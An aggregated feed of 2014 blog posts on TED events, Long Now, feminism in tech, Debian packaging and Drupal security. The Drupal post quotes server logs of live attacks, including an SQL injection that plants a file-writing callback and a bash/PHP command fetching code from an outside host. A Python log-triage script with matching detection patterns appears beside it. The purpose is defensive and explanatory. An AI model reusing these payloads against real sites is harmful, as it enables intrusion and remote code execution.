    Emmanuelle Roques, an organizer of TEDxBordeaux, used the conference as way to meet people in Rio de Janeiro, Brazil. Rather than watch from the theater, she traveled each day to a different collaborative space that was participating in TEDGlobal Para Todos to watch the livestream with whoever happened to be there. Read her diary.

    Igor Botelho Bernardes calls TEDGlobal a “life-changing” experience. On his site, AsBoasNovas.com (aka “The good news”), he shared a roundup of the Brazilian speakers who took the stage and teased out 15 ideas that he thinks could revolutionize the southern hemisphere. (In Portuguese.)

    Fabiano Serfaty wrote about his TEDGlobal experience through his blog for Veja magazine. Read his highlights,  and an interview with TED Fellow Joe Landolina, who talked about his incredible gel that stops severe bleeding. (In Portuguese.)

    Luke Barbara shares how he crowdfunded his way to TEDGlobal 2014.

    Gabriel Borges posted his diary of the event through ProjetoDraft.com. Read his recaps of day 1, day 2, and day 3 – or skip on over to his final thoughts. (In Portuguese.) 

    Rishad Tobaccowala of Publicis Groupe revealed the three main takeaways that he saw in the TEDGlobal program, including the many ways that the intersection of mobile technology and cloud computing is having an impact.

    Paul Robert Reid admits that he has “Post #TEDGlobal blues.” Another fun read from his site: his recap of visiting Jardim Gramacho, aka Rio’s rubbish dump, where artist Vik Muniz found materials for his work “Waste Land.” 

    And if you too have blogged about watching TED Live or going to the conference — share a link in the comments!


    LongNowMark Lynas: 9 Planetary Boundaries, Finessing the Anthropocene — Seminar Flashback

    “The Holocene is over and welcome to the Anthropocene our very uniquely human geological era.” In March 02012 environmental activist and author Mark Lynas gave a sobering assessment of Earth in the Anthropocene.

    Lynas offers a framework for tracking the health of our planet, outlining nine measurable “boundaries” that if crossed threaten the well-being of humans on Earth. And some already had been crossed in 02012. These systems go beyond climate and biodiversity to measures like ocean acidification, atmospheric aerosols, and excess nitrogen in agriculture.

    Long Now members can watch this video here. The audio is free for everyone on the Seminar page and via podcast. Long Now members can see all Seminar videos in HD. Video of the 12 most recent Seminars is also free for all to view.


    From Stewart Brand’s summary of the talk (in full here):

    We’ve raised the temperature of the Earth system, reduced the alkalinity of the oceans, altered the chemistry of the atmosphere, changed the reflectivity of the planet, hugely affected the distribution of freshwater, and killed off many of the species that share the planet with us. [...] Some of those global alterations made by humans may be approaching tipping points—thresholds—that could destabilize the whole Earth system.

    Mark Lynas‘ books include Six Degrees (which Stewart Brand called one of the finest books written on climate), The God Species: How the Planet Can Survive the Age of Humans, and most recently Nuclear 2.0: Why a Green Future Needs Nuclear Power (02014). He is a member of the World Economic Forum’s Global Agenda Council on Decarbonising Energy, which focuses on sustainable energy to mitigate climate change.

    Mark Lynas: Nine Planetary Boundaries, Finessing the Anthropocene

    The Seminars About Long-term Thinking series began in 02003 and is presented each month live in San Francisco. It is curated and hosted by Long Now’s President Stewart Brand. Seminar audio is available to all via podcast.

    Everyone can watch full video of the 12 most recent Long Now Seminars. Long Now members can watch this video in full—you must be logged in to the site—and the full ten years of Seminars in HD. Membership levels start at $8/month and include lots of benefits.

    You can join Long Now here.

    Geek FeminismBuffy the Linkspam Slayer

    • Anita Sarkeesian explains why she canceled USU lecture | Salt Lake City Tribune (October 16): “A nationally known feminist media critic said Wednesday that “it would be irresponsible” to give a lecture amidst mass shooting threats at Utah State University, knowing that police would not screen for weapons at the door. In a phone interview from San Francisco, Anita Sarkeesian said she canceled Wednesday’s lecture not because of three death threats — one of which promised “the deadliest school shooting in American history” — but because firearms would be allowed in spite of the threats.”
    • When gun rights trump public safety | Mary Elizabeth Williams (October 15): “It’s one thing to accept and understand that plenty of reasonable and responsible people own guns and that is their constitutional right. It is another to be so outrageously afraid of legitimate and sane restrictions that you have a situation in which it is entirely permissible to carry a loaded weapon into an event that carries a threat that the people attending it will “die screaming.””
    • The Threats Against Anita Sarkeesian Expose The Darkest Aspects of Online Misogyny | Maureen Ryan (October 15): “The question that’s been haunting many observers for weeks is now right out in the open in the wake of the latest threats leveled at Sarkeesian: Is someone going to have to die for things to change?”
    • #Gamergate Trolls Aren’t Ethics Crusaders; They’re a Hate Group | Jezebel (October 13): “I set about locking down accounts, emailing professors, contacting campus safety, and calling family. It was an exhausting process, but I considered it necessary. The attack could get out of hand. I mentioned offhand to my sister, about two hours in, that “it was getting to be my turn anyways,” to nonchalantly minimize my hurt. That was the moment I broke down. I realized just how much I’d internalized the presumed process: if you’re even asking about equality or diversity in games, being shouted down in a traumatizing manner is now a mandatory step that you have to sit back and endure.”
    • Sweatin’ the Small Stuff, of, Beware Your Throwaway Jokes About Middle-Aged Women in Magic | One General to Rule them All (October 14): “I dare Wizards to give us a major female Magic character (read: Planeswalker) in the next couple of sets who doesn’t have a body that wouldn’t look out of place on a runway or the cover of Playboy. Tamiyo, the Moon Sage was a great start, but that was three blocks ago. Hell, at this point, I’ll take more than one female Planeswalker per set.”
    • AdaCamp: Spending Time with Women in Open Source and Technology | Zara Rahman (October 13): “There were some sessions that really opened my eyes to another area of this ‘open’ bubble- for example, talking about women in open source. Most of the women there were coders, who had contributed to open source code projects; and despite my having read accounts of abuse and harassment within the open source community fairly regularly before, the severity of the situations they face, really hit home for me during this session.”
    • Ada Lovelace Day: Meet the 6 women who gave you ‘the computer’ | The Register (October 14): “All six are now sadly no longer with us – Bartik was the last to pass away. But their achievements were profound, not just in terms of inadvertently cementing the name “computer”. In the absence of manuals literally working out how to use this giant, the team of six installed computer programs working from sheets of paper, nimbly unplugging and replugging a rat’s nest of cables and resetting switches.”
    • Don’t Be Fooled by Apple and Facebook, Egg Freezing Is Not a Benefit | The Daily Beast (October 15): “Of all the women Snyder surveyed, nearly 90 percent of them said they did not plan on returning to the tech industry in the future. The incompatibility between motherhood and tech, it seems, runs far deeper than the timing of pregnancy alone. And the problem is so severe that the women who leave almost never want to come back. In this context, the decision to cover egg freezing reads as Silicon Valley at its most typical, deploying a hasty technological stopgap for a cultural problem.”
    • Tech’s Meritocracy Problem | Medium (October 10): “Engineers love to be skeptics — it’s time to bring our skepticism to the concept of meritocracy. If we can be skeptical enough about our own ability to detect merit, and balance it with more objective measurement or outright mitigatory adjustments — we’ll come closer to resembling an actual meritocracy.”
    • HERoes: Genevieve Valentine | Comicosity (October 2): “From journalist to award winning novelist, Genevieve Valentine is now channeling her inner crime boss. She is providing a new voice to a suited up Selina Kyle, starting with this month’s issue of Catwoman. She tells Comicosity about switching the role of female characters in comics and the importance of reader perspective while consuming.”
    •  Comic Books are Still Made by Men, For Men, and About Men | FiveThirtyEight (October 13): “But these recent advancements don’t make up for the fact that women have been ignored in comic books for decades. And they still don’t bring women anywhere close to parity: Females make up about one in four comic book characters. Among comic-creators, the numbers are even more discouraging. Tim Hanley, a comics historian and researcher, analyzes who’s behind each month’s batch of releases, counting up writers, artists, editors, pencilers and more. In August, Hanley found that men outnumbered women nine-to-one behind the scenes at both DC and Marvel.”
    • Life, Engineered: How Lynn Conway reinvented her world and ours | University of Michigan (October 8): “Ten years earlier, Conway had been one of the first Americans to undergo a modern gender transition. It had cost her a job and her family. Once she established herself as a woman, she kept the past a secret. Conway stayed behind the scenes as much as she could. As a result, so did many of her achievements.”

    We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet DebianMartin Pitt: Ramblings from LinuxCon/Plumbers 2014

    I’m on my way home from Düsseldorf where I attended the LinuxCon Europe and Linux Plumber conferences. I was quite surprised how huge LinuxCon was, there were about 1.500 people there! Certainly much more than last year in New Orleans.

    Containers (in both LXC and docker flavors) are the Big Thing everybody talks about and works with these days; there was hardly a presentation where these weren’t mentioned at all, and (what felt like) half of the presentations were either how to improve these, or how to use these technologies to solve problems. For example, some people/companies really take LXC to the max and try to do everything in them including tasks which in the past you had only considered full VMs for, like untrusted third-party tenants. For example there was an interesting talk how to secure networking for containers, and pretty much everyone uses docker or LXC now to deploy workloads, run CI tests. There are projects like “fleet” which manage systemd jobs across an entire cluster of containers (distributed task scheduler) or like project-builder.org which auto-build packages from each commit of projects.

    Another common topic is the trend towards building/shipping complete (r/o) system images, atomic updates and all that goodness. The central thing here was certainly “Stateless systems, factory reset, and golden images” which analyzed the common requirements and proposed how to implement this with various package systems and scenarios. In my opinion this is certainly the way to go, as our current solution on Ubuntu Touch (i. e. Ubuntu’s system-image) is far too limited and static yet, it doesn’t extend to desktops/servers/cloud workloads at all. It’s also a lot of work to implement this properly, so it’s certainly understandable that we took that shortcut for prototyping and the relatively limited Touch phone environment.

    On Plumbers my main occupations were mostly the highly interesting LXC track to see what’s coming in the container world, and the systemd hackfest. On the latter I was again mostly listening (after all, I’m still learning most of the internals there..) and was able to work on some cleanups and improvements like getting rid of some of Debian’s patches and properly run the test suite. It was also great to sync up again with David Zeuthen about the future of udisks and some particular proposed new features. Looks like I’m the de-facto maintainer now, so I’ll need to spend some time soon to review/include/clean up some much requested little features and some fixes.

    All in all a great week to meet some fellows of the FOSS world again, getting to know a lot of new interesting people and projects, and re-learning to drink beer in the evening (I hardly drink any at home :-P).

    If you are interested you can also see my raw notes, but beware that they are mostly just scribbling.

    Now, off to next week’s Canonical meeting in Washington, DC!

    Planet DebianGunnar Wolf: #Drupal7 sites under attack — Don't panic!

    Two days ago, Drupal announced version 7.32 was available. This version fixes a particularly nasty bug, allowing a SQL injection at any stage of interaction (that means, previous to the authentication taking place).

    As soon as I could, I prepared and uploaded Debian packages for this — So if you run a Debian-provided Drupal installation, update now. The updated versions are:

    • sid / jessie (unstable / testing): 7.32-1
    • wheezy (stable): 7.14-2+deb7u7
    • wheezy-backports: 7.32-1~bpo70+1
    • squeeze-backports (oldstable): 7.14-2+deb7u7~bpo60+1

    And, as expected, I'm already getting several attacks on my sites. Good thing that will help you anyway: Even though it won't prevent the attack from happening, if you use suhosin, several of the attacks will be prevented. Yes, sadly suhosin has not been in a stable Debian release since Wheezy, but still... :-|

    Partial logs. This looks like a shellcode being injected as a file created via the menu_router mechanism (shellcode snipped):

    Oct 16 15:22:21 lafa suhosin[3723]: ALERT - configured request variable
    total name length limit exceeded - dropped variable 'name[0; INSERT INTO
    `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`,
    `access_callback`, `access_arguments`) VALUES ('deheky', '', '', 'deheky',
    'file_put_contents',
    +0x613a323a7b693a303b733a32323a226d6f64756c65732f64626c6f672f746e777(...)
    );;# ]' (attacker '62.76.191.119', file '/usr/share/drupal7/index.php')

    While the previous one is clearly targeting this particular bug, I'm not sure about this next one: It is just checking for some injection viability before telling me its real intentions:

    Oct 17 10:26:04 lafa suhosin[3644]: ALERT - configured request variable
    name length limit exceeded - dropped variable
    '/bin/bash_-c_"php_-r_\"file_get_contents(
    'http://hello_hacked_jp/hello/?l'
    (attacker '77.79.40.195', file '/usr/share/drupal7/index.php')

    So... looking at my logs from the last two days, Suhosin has not let any such attack reach Drupal (or I have been h4x0red and the logs have all been cleaned — Cannot dismiss that possibility :-) )

    Anyway... We shall see many such attempts in the next weeks :-|

    [update] Yes, I'm not the only one reporting this attack in the wild. Zion Security explains the same attempt I logged: It attempts to inject PHP code so it can be easily executed remotely (and game over for the admin!)

    For the more curious, Tamer Zoubi explains the nature and exploitation of this bug.
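
    A triage sketch for suhosin alerts of the kind quoted above, added here as an example and not part of the original post: it parses each ALERT line, extracts the dropped variable name and source address, and tags names that carry SQL inside an array key, a shell path or PHP file functions. The sample lines are constructed in the same format (documentation-range addresses, placeholder payload); the tag names and patterns are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample lines modelled on the suhosin alert format shown in the post.
# Addresses are documentation ranges; the hex payload is a placeholder.
SAMPLE_LOG = r"""
Oct 16 15:22:21 web1 suhosin[3723]: ALERT - configured request variable total name length limit exceeded - dropped variable 'name[0; INSERT INTO `menu_router` (`path`, `access_callback`) VALUES ('x', 'file_put_contents', +0xPLACEHOLDER );;# ]' (attacker '203.0.113.10', file '/usr/share/drupal7/index.php')
Oct 17 10:26:04 web1 suhosin[3644]: ALERT - configured request variable name length limit exceeded - dropped variable '/bin/bash_-c_"php_-r_\"file_get_contents(' (attacker '198.51.100.7', file '/usr/share/drupal7/index.php')
Oct 17 11:02:40 web1 suhosin[3650]: ALERT - configured request variable name length limit exceeded - dropped variable 'a_very_long_but_harmless_form_field_name' (attacker '192.0.2.33', file '/usr/share/drupal7/index.php')
Oct 17 11:03:00 web1 sshd[812]: Accepted publickey for admin from 192.0.2.1
""".strip().splitlines()

# The variable name itself contains single quotes, so match it greedily and
# anchor on the trailing "(attacker '...', file '...')" suffix instead.
ALERT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\ssuhosin\[\d+\]:\sALERT - "
    r"(?P<reason>.*?) - dropped variable '(?P<var>.*)' "
    r"\(attacker '(?P<ip>[^']+)', file '(?P<file>[^']+)'\)\s*$"
)

# Heuristic tags (assumed names). The first matches a SQL statement placed
# after a ';' inside an array key, as in the 'name[0; INSERT INTO ...' alert.
TAG_PATTERNS = {
    "sql-in-array-key": re.compile(
        r"\[[^\]]*?;\s*(?:INSERT|UPDATE|DELETE|SELECT|DROP)\b", re.I),
    "php-file-function": re.compile(r"file_(?:put|get)_contents", re.I),
    "shell-invocation": re.compile(r"/bin/(?:ba)?sh"),
}


def parse_alert(line):
    """Return the fields of one suhosin ALERT line, or None for other lines."""
    match = ALERT_RE.match(line)
    return match.groupdict() if match else None


def classify(var_name):
    """Return the sorted list of heuristic tags that the variable name triggers."""
    return sorted(tag for tag, rx in TAG_PATTERNS.items() if rx.search(var_name))


def triage(lines):
    """Parse every suhosin alert in `lines` and attach its tags."""
    findings = []
    for line in lines:
        alert = parse_alert(line)
        if alert is None:
            continue  # not a suhosin "dropped variable" alert
        alert["tags"] = classify(alert["var"])
        findings.append(alert)
    return findings


def suspicious_sources(findings):
    """Count tagged alerts per source address."""
    hits = Counter(f["ip"] for f in findings if f["tags"])
    return dict(hits)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f["ts"], f["ip"], f["tags"] or "untagged", f["var"][:60])
    print(suspicious_sources(results))
```

    Suhosin only logs the variables it dropped, so an empty result says nothing about requests that were not dropped.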

    Planet DebianErich Schubert: Google Earth on Linux

    Google Earth for Linux appears to be largely abandoned by Google, unfortunately. The packages available for download cannot be installed on a modern amd64 Debian or Ubuntu system due to dependency issues.
    In fact, the amd64 version is a 32 bit build, too. The packages are really low quality, the dependencies are outdated, locales support is busted etc.
    So here are hacky instructions how to install nevertheless. But beware, these instructions are a really bad hack.
    1. These instructions are appropriate for version 7.1.2.2041-r0. Do not use them for any other version. Things will have changed.
    2. Make sure your system has i386 architecture enabled. Follow the instructions in section "Configuring architectures" on the Debian MultiArch Wiki page to do so
    3. Install lsb-core, and try to install the i386 versions of these packages, too!
    4. Download the i386 version of the Google Earth package
    5. Install the package by forcing dependencies, via
      sudo dpkg --force-depends -i google-earth-stable_current_i386.deb
      
    6. As of now, your package manager will complain, and suggest to remove the package again. To make it happy, we have to hack the installed packages list. This is ugly, and you should make a backup. You can totally bust your system this way... Fortunately, the change we're doing is rather simple. As admin, edit the file /var/lib/dpkg/status. Locate the section Package: google-earth-stable. In this section, delete the line starting with Depends:. Don't add in extra newlines or change anything else!
    7. Now the package manager should believe the dependencies of Google Earth are fulfilled, and no longer suggest removal. But essentially this means you have to take care of them yourself!
    Some notes on using Google Earth:
    • Locales are busted. Use LC_NUMERIC=en_US.UTF-8 google-earth to start it. Otherwise, it will fail parsing coordinates, if you are in a locale that uses a different number format.
    • You may need to install the i386 versions of some libraries, in particular of your OpenGL drivers! I cannot provide you with a complete list.
    • Search doesn't work sometimes for me.
    • Occasionally, it reports "unknown" network errors.
    • If you upgrade Nvidia graphics drivers, you will usually have to reboot, or you will see graphics errors.
    • Some people have removed/replaced the bundled libQt* and libfreeimage* libraries, but that did not work for me.

    Planet DebianTanguy Ortolo: Trying systemd [ OK ] Switching back to SysV [ OK ]

    Since systemd is now the default init system under Debian Jessie, it got installed to my system and I had a chance to test it. The result is disappointing: it does not work well with cryptsetup, so I am switching back to SysV init and RC.

    The problem comes from the fact that I am using encrypted drives with cryptsetup, and while this is correctly integrated with SysV, it just sucks with systemd, where the passphrase prompt is mixed up with service start messages, a bit like that (from memory, since I did not take a picture of my system booting):

    Enter passphrase for volume foobar-crypt:
    [ OK ] Sta*rting serv*ice foo**
    [ OK ] ***Starting service bar**
    [ OK ] Starting service baz****
    

    The stars correspond to the letters I type, and as you can see, as the passphrase prompt does not wait for my input, they get everywhere in the boot messages, and there is no clear indication that the passphrase was accepted. This looks like some pathological optimization for boot speed, where even interactive steps are run in parallel with services startup: sorry, but this is just insane.

    There may exist ways to work around this issue, but I do not care: SysV init works just fine with no setup at all, and since I have no real need for another init system, systemd as a replacement is only acceptable if it works at least as fine for my setup, which is not the case. Goodbye systemd, come back when you are ready.

    Sociological Images“Rental Dreads”: Female Sex Tourists in the Caribbean

    Flashback Friday.

    While preparing a lecture on sex tourism, I ran across this video about men who have sex with female tourists in the Caribbean:


    There’s a lot of interesting stuff going on there, no? I was fascinated by the female hotel owner who talks about the men “preying” on the female tourists, clearly placing the power in the hands of the men who, she argues, use the female tourists for money but don’t really care about them. I tried to imagine someone talking similarly about female sex workers “preying” on foreign men’s need for affection and attention.

    This might make for a great discussion about perceptions of sexual agency: how do gendered sexual norms, economic differences, and the different races and nationalities of the individuals involved affect how we think of their interactions and who we see as the victim?

    In her chapter on sex tourism in Race, Ethnicity, and Sexuality, sociologist Joane Nagel discusses the role of racialized sexualities in making some groups attractive to tourists looking for an ethnosexual adventure. In the Caribbean, dark-skinned men with dreads are particularly attractive to some female tourists because of stereotypes of Black men as extremely sexual and masculine, which plays into fantasies of being swept away by a strong, skilled lover. At the same time, White Western women may represent the possibility of a better life (through continued gifts of money even after the vacation is over) and sexualized adventures to the men they sleep with while on vacation. Nagel argues that these encounters generally reinforce, rather than challenge, existing racial and gender inequalities, since they play on stereotypes of sexualized Others as animalistic, primitive, and, in the case of men, as super-masculine (and super-endowed).

    Then again, Nagel also questions whether any relationship between tourists and “local” men should count as sex work. The individuals involved don’t necessarily think of their interactions in those terms. And who is to decide if a particular situation is “sex tourism” as opposed to a “real” relationship? How does that assumption invalidate the possibility that Black men and White women might have real, meaningful relationships? Or primarily sexual relationships, but with both partners respecting the other?

    Originally posted in 2009.

    Gwen Sharp is an associate professor of sociology at Nevada State College. You can follow her on Twitter at @gwensharpnv.

    (View original at http://thesocietypages.org/socimages)

    Planet DebianLucas Nussbaum: Debian Package of the Day revival (quite)

    TL;DR: static version of http://debaday.debian.net/, as it was when it was shut down in 2009, available!

    A long time ago, between 2006 and 2009, there was a blog called Debian Package of the Day. About once per week, it featured an article about one of the gems available in the Debian archive: one of those many great packages that you had never heard about.

    At some point in November 2009, after 181 articles, the blog was hacked and never brought up again. Last week I retrieved the old database, generated a static version, and put it online with the help of DSA. It is now available again at http://debaday.debian.net/. Some of the articles are clearly outdated, but many of them are about packages that are still available in Debian, and still very relevant today.

    Planet DebianRhonda D'Vine: New Irssi

    After a long time a new irssi upstream release hit the archive. While the most notable change in 0.8.16 was DNSSEC DANE support which is enabled (for linux, src:dnsval has issues to get compiled on kFreeBSD), the most visible change in 0.8.17 was addition of support for both 256 colors and truecolor. While the former can be used directly, for the latter you have to explicitly switch the setting colors_ansi_24bit to on. Terminal support is needed for that though. To test the 256 color support, your terminal has to support it, your TERM environment variable has to be properly set, and you can test it with the newly added /cubes alias. If you have an existing configuration, look at the Testing new Irssi wiki page which helps you get that alias amongst giving other useful tips, too.

    The package currently only lives in unstable, but once it did flow over to testing I will update it in wheezy-backports, too.

    Enjoy!


    Planet Linux AustraliaPaul Wayper: That time that I registered an electric vehicle

    So, tell us a story, Uncle Paul.

    Sure. One time when I was in Rovers, ...

    No, tell us the story of how you got your electric motorbike registered!

    Oh, okay then.

    It was the 20th of February - a Friday. I'd taken the day off to get the bike registered. I'd tried to do this a couple of weeks before then, but I found out that, despite being told a month beforehand that the workload on new registrations was only a couple of days long, when I came to book it I found out that the earliest they could do was the 20th, two weeks away. So the 20th it was.

    That morning I had to get the bike inspected by the engineer, get his sign-off, and take it down to the motor registry to get it inspected at 8:30AM. I also had to meet the plumber at our house, which meant I left a bit late, and by the time I was leaving the engineer it was already 8:15AM and I was in traffic. Say what you like about Canberra being a small town, but people like driving in and the traffic was a crawl. I rang the motor registry and begged for them to understand that I'd be there as soon as possible and that I might be a couple of minutes late. I squeaked into the entrance just as they were giving up hope, and they let me in because of the novelty of the bike and because I wasn't wasting their time.

    The roadworthy inspection went fairly harmlessly - I didn't have a certificate from a weighbridge saying how heavy it was, but I knew it was only about eight kilos over the original bike's weight, so probably about 240 kilos? "OK, no worries," they said, scribbling that down on the form. The headlights weren't too high, the indicators worked, and there was no problem with my exhaust being too loud.

    (Aside: at the inspection station there they have a wall full of pictures of particularly egregious attempts to get dodgy car builds past an inspection. Exhaust stuffed full of easily-removable steel wool? Exhausts with big burnt patches where they've been oxy'd open and welded shut again? Panels attached with zip ties? Bolts missing? Plastic housings melted over ill-fitted turbos? These people have seen it all. Don't try to fool them.)

    Then we came up to the really weird part of my dream. You know, the part where I know how to tap dance, but I can only do it while wearing golf shoes?

    Er, sorry. That was something else. Then we came to the weird part of the process.

    Modified vehicles have to get a compliance plate, to show that they comply with the National Code of Practice on vehicle conversions. The old process was that the engineer that inspected the vehicle to make sure it complied had blank compliance plates; when you brought the vehicle in and it passed their inspection, they then filled out all the fields on the plate, attached the plate to the vehicle, and then you transported it down to Main Roads. But that was a bit too open to people stealing compliance plates, so now they have a "better" system. What I had to do was:

    1. Get the bike inspected for road worthiness.
    2. They hand me a blank compliance plate.
    3. I then had to take it to the engineer, who told me the fields to fill in.
    4. He then told me to go to a trophy making place, where they have laser etchers that can write compliance plates beautifully.
    5. I arrive there at 11AM. They say it'll be done by about 2PM.
    6. Go and have lunch with friends. Nothing else to do.
    7. Pick etched compliance plate up.
    8. Take compliance plate back to engineer. Because he's busy, borrow a drill and a rivet gun and attach the plate to the bike myself.
    9. Take it back to Main Roads, who check that the plate is attached to the bike correctly and stamp the road worthiness form. Now I can get the bike registered.

    Yeah, it's roundabout. Why not engrave the plates at Main Roads with the details the Engineer gives to them? But that's the system, so that's what I did.

    And so I entered the waiting department. It only probably took about fifteen minutes to come up next in the queue, but it was fifteen minutes I was impatient to see go. We went through the usual hilarious dance with values:

    • Her: What are you registering?
    • Me: An electric motorbike.
    • Her: How many cylinders?
    • Me: Er... it's electric. None.
    • Her: None isn't a value I can put in.
    • Me: (rolls eyes) OK, one cylinder.
    • Her: OK. How many cubic centimetres?

    Many months ago I had enquired about custom number plates, and it turns out that motorbikes can indeed have them. Indeed, I could buy "3FAZE" if I wanted. For a mere $2,600 or so. It was very tempting, but when I weighed it up against getting new parts for the bike (which it turned out I would need sooner rather than later, but that's a story for another day) I thought I'd save up for another year.

    So I finally picked up my new set of plates, thanked her for her time, and said "Excuse me, but I have to do this:" and then yelled:

    "Yes!!!!"

    Well, maybe I kept my voice down a little. But I had finally done it - after years of work, several problems, one accident, a few design changes, and lots of frustration and gradual improvement, I had an actual, registered electric motorbike I had built nearly all myself.

    I still get that feeling now - I'll be riding along and I'll think, "wow, I'm actually being propelled along by a device I built myself. Look at it, all working, holding together, acting just like a real motorbike!" It feels almost like I've got away with something - a neat hack that turns out to work just as well as all those beautifully engineered mega-budget productions. I'm sure a lot of people don't notice it - it does look a bit bulky, but it's similar enough to a regular motorbike that it probably just gets overlooked as another two-wheeled terror on the roads.

    Well, I'll just have to enjoy it myself then :-)

    Planet DebianPetter Reinholdtsen: Debian Jessie, PXE and automatic firmware installation

    When PXE installing laptops with Debian, I often run into the problem that the WiFi card requires some firmware to work properly. And it has been a pain to fix this using preseeding in Debian. Normally something more is needed. But thanks to my isenkram package and its recent tasksel extension, it has now become easy to do this using simple preseeding.

    The isenkram-cli package provides tasksel tasks which will install firmware for the hardware found in the machine (actually, requested by the kernel modules for the hardware). (It can also install user space programs supporting the hardware detected, but that is not the focus of this story.)

    To get this working in the default installation, two preseeding values are needed. First, the isenkram-cli package must be installed into the target chroot (aka the hard drive) before tasksel is executed in the pkgsel step of the debian-installer system. This is done by preseeding the base-installer/includes debconf value to include the isenkram-cli package. The package name is next passed to debootstrap for installation. With the isenkram-cli package in place, tasksel will automatically use the isenkram tasks to detect hardware specific packages for the machine being installed and install them, because isenkram-cli contains tasksel tasks.

    Second, one needs to enable the non-free APT repository, because most firmware unfortunately is non-free. This is done by preseeding the apt-mirror-setup step. This is unfortunate, but for a lot of hardware it is the only option in Debian.

    The end result is two lines needed in your preseeding file to get firmware installed automatically by the installer:

    base-installer base-installer/includes string isenkram-cli
    apt-mirror-setup apt-setup/non-free boolean true
    

    The current version of isenkram-cli in testing/jessie will install both firmware and user space packages when using this method. It also does not work well, so use version 0.15 or later. Installing both firmware and user space packages might give you a bit more than you want, so I decided to split the tasksel task in two, one for firmware and one for user space programs. The firmware task is enabled by default, while the one for user space programs is not. This split is implemented in the package currently in unstable.

    If you decide to give this a go, please let me know (via email) how this recipe works for you. :)

    So, I bet you are wondering, how can this work. First and foremost, it works because tasksel is modular, and driven by whatever files it finds in /usr/lib/tasksel/ and /usr/share/tasksel/. So the isenkram-cli package places two files for tasksel to find. First there is the task description file (/usr/share/tasksel/descs/isenkram.desc):

    Task: isenkram-packages
    Section: hardware
    Description: Hardware specific packages (autodetected by isenkram)
     Based on the detected hardware various hardware specific packages are
     proposed.
    Test-new-install: show show
    Relevance: 8
    Packages: for-current-hardware
    
    Task: isenkram-firmware
    Section: hardware
    Description: Hardware specific firmware packages (autodetected by isenkram)
     Based on the detected hardware various hardware specific firmware
     packages are proposed.
    Test-new-install: mark show
    Relevance: 8
    Packages: for-current-hardware-firmware
    

    The key parts are Test-new-install which indicates how the task should be handled and the Packages line referencing a script in /usr/lib/tasksel/packages/. The scripts use other scripts to get a list of packages to install. The for-current-hardware-firmware script looks like this to list relevant firmware for the machine:

    #!/bin/sh
    #
    PATH=/usr/sbin:$PATH
    export PATH
    isenkram-autoinstall-firmware -l
    

    With those two pieces in place, the firmware is installed by tasksel during the normal d-i run. :)

    If you want to test what tasksel will install when isenkram-cli is installed, run DEBIAN_PRIORITY=critical tasksel --test --new-install to get the list of packages that tasksel would install.
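
    To review a task description file such as the one above before an unattended install, the stanzas can be parsed to list each task, its Test-new-install setting and the Packages script it calls. This is an added example, not code from isenkram or tasksel; the function names are hypothetical, and treating a first Test-new-install word of "mark" or "install" as "selected by default on a new install" is an assumption that matches the post's statement that only the firmware task is enabled by default.

```shell
#!/bin/sh
# Added example (not part of isenkram or tasksel): audit a tasksel task
# description file before relying on it in an unattended install.

# write_sample_desc FILE
# Writes the isenkram.desc listing quoted in the post to FILE.
write_sample_desc() {
    cat > "$1" <<'EOF'
Task: isenkram-packages
Section: hardware
Description: Hardware specific packages (autodetected by isenkram)
 Based on the detected hardware various hardware specific packages are
 proposed.
Test-new-install: show show
Relevance: 8
Packages: for-current-hardware

Task: isenkram-firmware
Section: hardware
Description: Hardware specific firmware packages (autodetected by isenkram)
 Based on the detected hardware various hardware specific firmware
 packages are proposed.
Test-new-install: mark show
Relevance: 8
Packages: for-current-hardware-firmware
EOF
}

# list_tasks FILE
# Prints one tab-separated line per stanza:
#   task name, Test-new-install words, Packages value ("-" if absent).
list_tasks() {
    awk '
        function emit() {
            if (task != "")
                printf "%s\t%s\t%s\n", task,
                       (test == "" ? "-" : test), (pkgs == "" ? "-" : pkgs)
            task = ""; test = ""; pkgs = ""
        }
        /^[ \t]*$/ { emit(); next }   # a blank line ends the stanza
        /^[ \t]/   { next }           # continuation line (description body)
        {
            colon = index($0, ":")
            if (colon == 0) next      # not a "Field: value" line
            key = tolower(substr($0, 1, colon - 1))
            val = substr($0, colon + 1)
            sub(/^[ \t]+/, "", val); sub(/[ \t]+$/, "", val)
            if (key == "task") task = val
            else if (key == "test-new-install") test = val
            else if (key == "packages") pkgs = val
        }
        END { emit() }                # last stanza may lack a trailing blank line
    ' "$1"
}

# default_tasks FILE
# Prints the tasks that would be pre-selected on a new install.
# Assumption: the first Test-new-install word is the new-install action,
# and "mark" or "install" means the task is selected without being asked for.
default_tasks() {
    list_tasks "$1" | awk -F '\t' '
        { split($2, w, " ") }
        w[1] == "mark" || w[1] == "install" { print $1 }
    '
}

# Demo run on the listing from the post.
tmpdir=$(mktemp -d) || exit 1
write_sample_desc "$tmpdir/isenkram.desc"
echo "task / Test-new-install / Packages script:"
list_tasks "$tmpdir/isenkram.desc"
echo "selected by default on a new install:"
default_tasks "$tmpdir/isenkram.desc"
rm -rf "$tmpdir"
```

    On an installed system the same functions can be pointed at the files under /usr/share/tasksel/descs/ to see which tasks will pull in packages from the enabled repositories without further prompting.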

    Debian Edu will be pilots in testing this feature, as isenkram is used there now to install firmware, replacing the earlier scripts.

    CryptogramHacking a Video Poker Machine

    Kevin Poulsen has written an interesting story about two people who successfully exploited a bug in a popular video poker machine.

    Worse Than FailureError'd: Sorry, but You Can't Do the Math

    "I guess that Intuit might have reasons for not allowing me to say Math was my least favorite subject in school," writes Alan R.

     

    "I really wanted to buy an audiobook or three, but I doubt it would be prudent considering the price," wrote L. H.

     

    Based on Petrea M's error, I have to wonder if TRUE and FALSE were also beginning in Hearthstone.

     

    "Even if nobody is in line at McDonalds, turns out it can still get pretty busy," writes Bob W.

     

     

    "At first, I was a little concerned that iFixit didn't carry the tool I needed to fix my Wii U," Tyler writes, "Thank goodness iFixit had it in stock!"

     

    Jan wrote, "I'm not sure that these are the enterprise experts that I want to work with!"

     

    "Sadly, I don't think that I'm smart enough to sign up," Sam P. writes.

     

